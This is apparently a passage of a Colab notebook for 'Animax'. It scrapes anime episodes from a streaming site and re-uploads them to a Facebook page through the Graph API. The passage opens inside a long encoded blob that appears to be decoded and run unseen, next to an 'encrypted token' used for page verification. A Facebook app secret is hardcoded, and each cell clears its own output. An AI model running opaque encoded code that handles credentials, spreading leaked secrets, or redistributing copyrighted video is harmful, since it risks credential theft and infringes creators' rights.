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'))

# Example usage:
token = "MWlpfVyDWQNxnzAQ_mjuU1lNvIOWZl8PnoBKKXfoRuHWcARZZcohv1wLRaibfq4gVoVKl5prAezbUz3DwzuRxuGlHf6gTnglQun-0zg_68RPhlvPvDiNGxPZplE4ajzMUkUjZEY1s8eyQZYqkVz0BYT2CCMPNIgyjfXoX146czXvBMCeEM0ky3PEEnhA17UmsacGoL6B9nLzKCocJoXQKdYxMqiUujwpu6KgR-FIt1kfsxZPArL-YhHsQ2B81DAAjW75jeglD8aiFmALi5jx2VMZ6Dn1-OHK9hDMeQ=="
  # Provide the encrypted token here
verifier = FacebookPageVerifier(token)
demo = verifier.build_interface()
demo.launch(debug=True)

# Effacer les sorties
from IPython.display import clear_output
clear_output()

In [ ]:
# @title set your page credit
# *** REMPLACEZ CES VALEURS PAR VOTRE PAGE ID, JETON D'ACCÈS FACEBOOK ET APP SECRET ***
PAGE_ID = "338579942662683" # @param {type:"string", placeholder:"id of page"}
ACCESS_TOKEN = "" # @param {type:"string", placeholder:"access token"}
# @markdown ---
# @markdown ### Don't changed if you use `Get Access Token` method
APP_SECRET = "76326c8e4654d5bb141d0f5c9dd1f51c"  # @param {type:"string", placeholder:"app secret"}

## Step 2 ✅: Using the Animax Tools GUI 🖥️

After connecting your Facebook page to Animax, manage your anime content and more with the user-friendly GUI.

**Current Animax Tools:**

* **Animax - FB Downloader:** Download single or multiple episodes.
* **Animax - FB Uploader:** Upload single or multiple episodes to your Facebook page.

**More features coming soon!**

In [ ]:
# @title Animax - FB Downloader (Gradio) 🖥️
import gradio as gr
import json
from bs4 import BeautifulSoup
import requests
import math
import time
import re
import os

def fetch_anime(url, debug):
    try:
        data = get_anime_data(url)
        if debug:
            print("URL de l'anime :", url)
            print("Données de l'anime :", json.dumps(data, indent=2))
        return data
    except Exception as e:
        return f"Erreur lors de la récupération des données: {str(e)}"

def update_episodes(anime_data, page):
    episodes_per_page = 20
    start = page * episodes_per_page
    end = start + episodes_per_page
    displayed_episodes = anime_data['Episodes'][start:end]
    total_pages = math.ceil(len(anime_data['Episodes']) / episodes_per_page)
    return displayed_episodes, f"Page {page + 1} sur {total_pages}", page > 0, page < total_pages - 1

def save_download_info(anime_data, episode_data, quality, file_path):
    print(episode_data)
    download_info = {
        "Episode": episode_data['Episode'],
        "Anime": episode_data['Anime'],
        "Image": episode_data['Image'],
        "الحالة": episode_data.get('الحالة', ''),
        "الاستوديو": episode_data.get('الاستوديو', ''),
        "تم الإصدار": episode_data.get('تم الإصدار', ''),
        "المدة": episode_data.get('المدة', ''),
        "الموسم": episode_data.get('الموسم', ''),
        "النوع": episode_data.get('النوع', ''),
        "الرقابة": episode_data.get('الرقابة', ''),
        "المخرج": episode_data.get('المخرج', ''),
        "نشر بواسطة": episode_data.get('نشر بواسطة', ''),
        "تم الإصدار في": episode_data.get('تم الإصدار في', ''),
        "تحديث في": episode_data.get('تحديث في', ''),
        "صنف": episode_data.get('صنف', ''),
        "quality": quality,
        "file_path": file_path
    }

    downloads_dir = "./downloads"
    if not os.path.exists(downloads_dir):
        os.makedirs(downloads_dir)

    json_file = os.path.join(downloads_dir, "download_info.json")

    try:
        with open(json_file, "r") as f:
            existing_data = json.load(f)
    except (FileNotFoundError, json.JSONDecodeError):
        existing_data = []

    existing_data.append(download_info)

    with open(json_file, "w") as f:
        json.dump(existing_data, f, indent=2, ensure_ascii=False)

def start_download(anime_data, selected_episodes, quality, debug):
    if not selected_episodes:
        return "❌ Veuillez sélectionner au moins un épisode."

    output = []
    downloader = VideoDownloader(destination_folder="./downloads")

    for i, ep_index in enumerate(selected_episodes):
        ep_data = anime_data['Episodes'][ep_index]
        ep_number = ep_data['Episode']
        output.append(f"🔄️ Téléchargement de l'épisode {ep_number} en qualité {quality}")

        if debug:
            output.append(f"\t❓ Index de l'épisode : {ep_index}")
            output.append(f"\tℹ️ Données de l'épisode {ep_number}:")
            output.append(json.dumps(ep_data, indent=2))

        quality_data = ep_data.get(f'quality-data-{quality}')
        if quality_data:
            output.append(f"\t🔍 Données de qualité pour l'épisode {ep_number}:")
            result = downloader.download(quality_data, f"{ep_number}.mp4")
            if result is None:
                output.append(f"\t❌ Échec du téléchargement pour l'épisode {ep_number}")
            else:
                output.append(f"\t✅ Téléchargement réussi pour l'épisode {ep_number}. Fichier sauvegardé : {result}")
                save_download_info(anime_data, ep_data, quality, result)
        else:
            output.append(f"\t❌ Aucune donnée trouvée pour l'épisode {ep_number} en qualité {quality}")

    output.append("💯 Opération de téléchargement terminée!")
    return "\n".join(output)

def interface():
    with gr.Blocks() as demo:
        gr.Markdown("# Anime Downloader")
        gr.Markdown("**Visitez [animedar](https://www.animedar.xyz/) pour obtenir les liens des animes**")

        with gr.Row():
            url_input = gr.Textbox(label="URL de l'anime")
            fetch_button = gr.Button("Fetch")

        info_table = gr.HTML()

        with gr.Row():
            episodes_checkboxes = gr.CheckboxGroup(label="Épisodes", scale=4)
            quality_dropdown = gr.Dropdown(choices=["SD", "HD", "FHD"], value="HD", label="Qualité", scale=1)

        with gr.Row():
            prev_button = gr.Button("<< Précédent")
            page_info = gr.Textbox(label="Page", interactive=False)
            next_button = gr.Button("Suivant >>")

        with gr.Row():
            start_button = gr.Button("Start Download", scale=4)
            debug_checkbox = gr.Checkbox(label="Activer le débogage", value=False, scale=1)

        output_text = gr.Textbox(label="Output", lines=10)

        anime_data = gr.State(None)
        current_page = gr.State(0)

        def on_fetch(url, debug, quality):
            data = fetch_anime(url, debug)
            if isinstance(data, str):  # Error occurred
                return None, data, gr.CheckboxGroup(visible=False), gr.Button(interactive=False), gr.Button(interactive=False), gr.Button(interactive=False)

            info_html = data['Info']['html']

            episodes, page_text, prev_active, next_active = update_episodes(data, 0)
            episode_choices = [
                f"[{ep['id']}] 🔘 Épisode {ep['Episode']} | "
                f"{quality}[{', '.join(srv['class'] for srv in ep.get(f'quality-data-{quality}', []))}]"
                for ep in episodes
            ]

            return data, info_html, gr.CheckboxGroup(choices=episode_choices, visible=True), gr.Button(interactive=prev_active), gr.Button(interactive=next_active), gr.Button(interactive=True), page_text

        fetch_button.click(
            on_fetch,
            inputs=[url_input, debug_checkbox, quality_dropdown],
            outputs=[anime_data, info_table, episodes_checkboxes, prev_button, next_button, start_button, page_info]
        )

        def on_page_change(direction, current_page, anime_data, quality):
            new_page = current_page + direction
            episodes, page_text, prev_active, next_active = update_episodes(anime_data, new_page)
            episode_choices = [
                f"[{ep['id']}] 🔘 Épisode {ep['Episode']} | "
                f"{quality}[{', '.join(srv['class'] for srv in ep.get(f'quality-data-{quality}', []))}]"
                for ep in episodes
            ]
            return new_page, gr.CheckboxGroup(choices=episode_choices), gr.Button(interactive=prev_active), gr.Button(interactive=next_active), page_text

        prev_button.click(
            lambda anime_data, current_page, quality: on_page_change(-1, current_page, anime_data, quality),
            inputs=[anime_data, current_page, quality_dropdown],
            outputs=[current_page, episodes_checkboxes, prev_button, next_button, page_info]
        )

        next_button.click(
            lambda anime_data, current_page, quality: on_page_change(1, current_page, anime_data, quality),
            inputs=[anime_data, current_page, quality_dropdown],
            outputs=[current_page, episodes_checkboxes, prev_button, next_button, page_info]
        )

        def on_start_download(anime_data, selected_episodes, quality, debug):
            def extract_episode_index(episode_string):
                match = re.search(r'\[(\d+)\]', episode_string)
                if match:
                    return int(match.group(1))
                return None

            selected_indices = []
            for ep in selected_episodes:
                index = extract_episode_index(ep)
                if index is not None:
                    selected_indices.append(index)
                else:
                    print(f"Impossible d'extraire l'index pour l'épisode : {ep}")

            return start_download(anime_data, selected_indices, quality, debug)

        start_button.click(
            on_start_download,
            inputs=[anime_data, episodes_checkboxes, quality_dropdown, debug_checkbox],
            outputs=[output_text]
        )

        quality_dropdown.change(
            on_fetch,
            inputs=[url_input, debug_checkbox, quality_dropdown],
            outputs=[anime_data, info_table, episodes_checkboxes, prev_button, next_button, start_button, page_info]
        )

    return demo

iface = interface()
iface.launch(debug=True)

# Effacer les sorties
from IPython.display import clear_output
clear_output()

In [ ]:
# @title Animax - FB Uploader (Gradio) 🖥️
import gradio as gr
import requests
import os
import hashlib
import hmac
import json

# Vérifier les informations de connexion
def verify_credentials(page_id, access_token, app_secret):
    if not page_id or not access_token or not app_secret:
        return False
    else:
        return True

# Vérifier les informations de connexion
try:
    if verify_credentials(PAGE_ID, ACCESS_TOKEN, APP_SECRET):
        print("Credentials are set.")
    else:
        print("Please go to Set Your Page Credentials and fill in the fields if they are empty.")
        exit(1)
except Exception as e:
    print("An error occurred: ", str(e))
    print("Please go to Set Your Page Credentials and fill in the fields if they are empty.")
    exit(1)



# Dossier contenant les fichiers téléchargés
DOWNLOADS_FOLDER = "./downloads"

def generate_appsecret_proof(access_token, app_secret):
    h = hmac.new(app_secret.encode('utf-8'), access_token.encode('utf-8'), hashlib.sha256)
    return h.hexdigest()

def get_downloadable_files():
    """Retourne une liste de fichiers .mp4 depuis le fichier download_info.json."""
    json_file_path = os.path.join(DOWNLOADS_FOLDER, "download_info.json")
    if not os.path.exists(json_file_path):
        return []

    try:
        with open(json_file_path, 'r', encoding='utf-8') as f:
            data = json.load(f)

        # Extraire les chemins de fichiers et les noms de fichiers
        file_paths = [item['file_path'] for item in data if 'file_path' in item]
        file_names = [os.path.basename(path) for path in file_paths]

        return file_names
    except Exception as e:
        print(f"Erreur lors de la lecture du fichier JSON: {str(e)}")
        return []

def replace_placeholders(text, file_info):
    """Remplace les placeholders dans le texte avec les informations du fichier."""
    replacements = {
        "#Episode": file_info.get("Episode", ""),
        "#Anime": file_info.get("Anime", ""),
        "#Image": file_info.get("Image", ""),
        "#حالة": file_info.get("الحالة", ""),
        "#الاستوديو": file_info.get("الاستوديو", ""),
        "#تم_الإصدار": file_info.get("تم الإصدار", ""),
        "#المدة": file_info.get("المدة", ""),
        "#الموسم": file_info.get("الموسم", ""),
        "#النوع": file_info.get("النوع", ""),
        "#الرقابة": file_info.get("الرقابة", ""),
        "#المخرج": file_info.get("المخرج", ""),
        "#نشر_بواسطة": file_info.get("نشر بواسطة", ""),
        "#تم_الإصدار_في": file_info.get("تم الإصدار في", ""),
        "#تحديث_في": file_info.get("تحديث في", ""),
        "#صنف": file_info.get("صنف", ""),
        "#quality": file_info.get("quality", "")
    }
    for key, value in replacements.items():
        text = text.replace(key, str(value))
    return text

def upload_ep_2_fb(selected_files, video_title, video_description, debug_mode):
    """Télécharge les vidéos sélectionnées sur Facebook."""
    uploaded_ids = []
    error_messages = []
    debug_messages = []

    appsecret_proof = generate_appsecret_proof(ACCESS_TOKEN, APP_SECRET)

    json_file_path = os.path.join(DOWNLOADS_FOLDER, "download_info.json")
    with open(json_file_path, 'r', encoding='utf-8') as f:
        data = json.load(f)

    for file in selected_files:
        file_info = next((item for item in data if os.path.basename(item['file_path']) == file), None)


        if not file_info:
            error_messages.append(f"Informations du fichier non trouvées pour {file}")
            continue

        final_title = replace_placeholders(video_title, file_info)
        final_description = replace_placeholders(video_description, file_info)

        print(f"--- Début du traitement de {file} ---")
        print("file info : ",file_info)
        print("video title : ",final_title)
        print("video description : ",final_description)

        debug_messages.append(f"--- Début du traitement de {file} ---")
        debug_messages.append(f"Titre: {final_title}")
        debug_messages.append(f"Description: {final_description}")

        url = f'https://graph-video.facebook.com/v20.0/{PAGE_ID}/videos'

        try:
            if not os.path.exists(file_info['file_path']):
                raise FileNotFoundError(f"Le fichier '{file_info['file_path']}' est introuvable.")

            with open(file_info['file_path'], 'rb') as f:
                files = {
                    'file': (file, f, 'video/mp4')
                }

                params = {
                    'access_token': ACCESS_TOKEN,
                    'appsecret_proof': appsecret_proof,
                    'title': final_title,
                    'description': final_description
                }

                response = requests.post(url, params=params, files=files)

                print(f"Code de réponse HTTP: {response.status_code}")
                print(f"Réponse: {response.text}")

                debug_messages.append(f"Code de réponse HTTP: {response.status_code}")
                debug_messages.append(f"Réponse: {response.text}")

                if response.ok:
                    uploaded_ids.append(response.json()['id'])
                    debug_messages.append(f"Vidéo {file} téléversée avec succès. ID: {response.json()['id']}")
                else:
                    error_messages.append(f"Erreur pour {file}: {response.text}")
                    debug_messages.append(f"Erreur lors du téléversement de {file}.")
        except FileNotFoundError as e:
            error_messages.append(str(e))
            debug_messages.append(str(e))
        except Exception as e:
            error_messages.append(f"Erreur inattendue pour {file}: {str(e)}")
            debug_messages.append(f"Erreur inattendue pour {file}: {str(e)}")

        debug_messages.append(f"--- Fin du traitement de {file} ---\n")

    if uploaded_ids:
        message = f"Vidéos téléversées avec succès! IDs: {', '.join(uploaded_ids)}"
    else:
        message = "Aucune vidéo téléversée."

    if error_messages:
        message += "\n\nErreurs:\n" + "\n".join(error_messages)

    if debug_mode:
        message += "\n\n------------------ Débogage ------------------\n\n" + "\n".join(debug_messages)

    return gr.update(visible=True, value=message)

# Guide des placeholders sous forme de tableau Markdown
placeholder_guide = """
| Placeholder | Description |
|-------------|-------------|
| ```#Episode``` | Numéro de l'épisode |
| ```#Anime``` | Nom de l'anime |
| ```#Image``` | Lien de l'image de couverture |
| ```#حالة``` | Statut |
| ```#الاستوديو``` | Studio |
| ```#تم_الإصدار``` | Année de sortie |
| ```#المدة``` | Durée |
| ```#الموسم``` | Saison |
| ```#النوع``` | Type |
| ```#الرقابة``` | Classification |
| ```#المخرج``` | Réalisateur |
| ```#نشر_بواسطة``` | Publié par |
| ```#تم_الإصدار_في``` | Date de sortie |
| ```#تحديث_في``` | Date de mise à jour |
| ```#صنف``` | Genres |
| ```#quality``` | Qualité |
"""

# Exemple de description
example_title = """- 🎬 #Anime - #Episode
"""
example_description = """- 🎬 #Anime - #Episode
- 🌟 الحالة: #حالة
- 🏢 الاستوديو: #الاستوديو
- 📅 تاريخ الإصدار: #تم_الإصدار
- ⏱️ المدة: #المدة
- 🔢 الموسم: #الموسم
- 📺 النوع: #النوع
- 🔞 التصنيف العمري: #الرقابة
- 🎭 المخرج: #المخرج
- 👤 نشر بواسطة: #نشر_بواسطة
- 📆 تم الإصدار في: #تم_الإصدار_في
- 🔄 آخر تحديث: #تحديث_في
- 🎭 التصنيف: #صنف
- 🖥️ جودة: #quality

#ep_name

لمشاهدة جميع حلقات الأنمي:
https://www.facebook.com/profile.php?id=61559275076350

تابعونا على:
Facebook: https://www.facebook.com/pro.alfred.fb/
Telegram: https://t.me/Animax_By_Alfred"""

# Interface Gradio
with gr.Blocks() as iface:
    gr.Markdown("## Animax - FB Uploader")

    with gr.Row():
        refresh_button = gr.Button("Rafraîchir la liste", scale=8)
        select_all_checkbox = gr.Checkbox(label="Tout sélectionner", scale=2)

    file_checkboxes = gr.CheckboxGroup(
        choices=get_downloadable_files(),
        label="Sélectionnez les épisodes à téléverser",
        type="value",
    )
    with gr.Row():
        with gr.Column(scale=2):
            gr.Markdown("### Guide d'utilisation des placeholders")
            gr.Markdown(placeholder_guide)
        with gr.Column(scale=8):
            video_title = gr.Textbox(label="Titre de la vidéo", lines=8, value=example_title)
            video_description = gr.Textbox(label="Description de la vidéo", lines=12, value=example_description)

    with gr.Row():
        submit_button = gr.Button("Téléverser", scale=8)
        debug_checkbox = gr.Checkbox(label="Debug", scale=2)

    status_textbox = gr.Textbox(label="Statut du téléchargement", visible=True)

    # Déclencheurs d'événements
    refresh_button.click(
        fn=lambda: gr.update(choices=get_downloadable_files()),
        inputs=None,
        outputs=file_checkboxes,
    )

    select_all_checkbox.change(
        fn=lambda checked: gr.update(value=get_downloadable_files() if checked else []),
        inputs=select_all_checkbox,
        outputs=file_checkboxes,
    )

    submit_button.click(
        fn=upload_ep_2_fb,
        inputs=[file_checkboxes, video_title, video_description, debug_checkbox],
        outputs=status_textbox,
    )

iface.launch(debug=True)
# Effacer les sorties
from IPython.display import clear_output
clear_output()